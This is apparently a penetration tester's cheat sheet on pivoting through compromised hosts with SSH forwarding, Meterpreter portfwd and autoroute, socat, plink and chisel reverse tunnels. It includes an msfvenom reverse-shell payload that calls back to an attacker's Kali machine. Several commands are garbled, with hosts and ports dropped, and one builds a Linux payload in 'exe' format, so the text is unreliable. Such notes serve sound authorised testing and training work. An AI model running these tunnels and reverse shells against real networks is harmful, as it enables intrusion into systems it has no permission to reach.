Skip to content


Local port forwarding: Forward a local port to a remote host

ssh -L <local_port>:<remote_host>:<remote_port> <username>@<remote_host>

Remote port forwarding: Forward a remote port to a local host

ssh -R <remote_port>:<local_host>:<local_port> <username>@<remote_host>
Dynamic port: Create a dynamic port forwarding
ssh -D <local_port> -p <remote_port> <username>@<remote_host>


socat file:`tty`,raw,echo=0 tcp-listen:8989

PORT FORWARDING "port to port":

  • MSF: Most platforms

Forward: Get meterpreter session on one of the dual homed machines

portfwd add -l 4445 -p 4443 -r ip
Use -R to make it reverse
  • SSH: For Linux

If you already have an SSH session

on my Kali machine listen on 8081, get it from
-R 8081:ip:80
Now you can access, which you didn't have direct access to
on your machine listen on 8083, send it to my Kali machine on 8084
-L 8083:ip:8084
Run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it,

For reverse shell:

msfvenom -p linux/x86/shell\_reverse\_tcp LHOST= LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali

Or if you didn't have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start,add a user, give it /bin/false in /etc/passwd

ssh -R 12345:
  • PLINK: Just like SSH, on Windows start ssh service, and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe ip -P 22 -C -N -L -l KALIUSER -pw PASS
  • SOCAT: For linux

Forward your 8083 to ip:443

./socat TCP4-LISTEN:8083,fork TCP4:ip:443
  • CHISEL: Most platforms

Remote static tunnels "port to port":

On Kali "reverse proxy listener":

./chisel server -p 8000 -reverse

General command:

./chisel client : L/R:\[YOUR LOCAL IP]:::

Remote tunnels "access IP:PORT you couldn't access before":

On Target: ./chisel client ip:8000 R:
Local tunnels "listen on the target for something, and send it to us":
On Target: ./chisel client 9001:

DYNAMIC "port to any": setup proxychains with socks5 on Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf

  • MSF: Most platforms

Get meterpreter session on one of the dual homed machines Auto route to ip (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a)

  • SSH: For Linux
  • PLINK: Just like SSH, on Windows
On Target: plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
  • CHISEL: Most platforms

On Kali: ./chisel server -p 8000 -reverse
On Target: ./chisel client ip:8000 R:8001: ./chisel server -p 8001 --socks5
On Kali: ./chisel client socks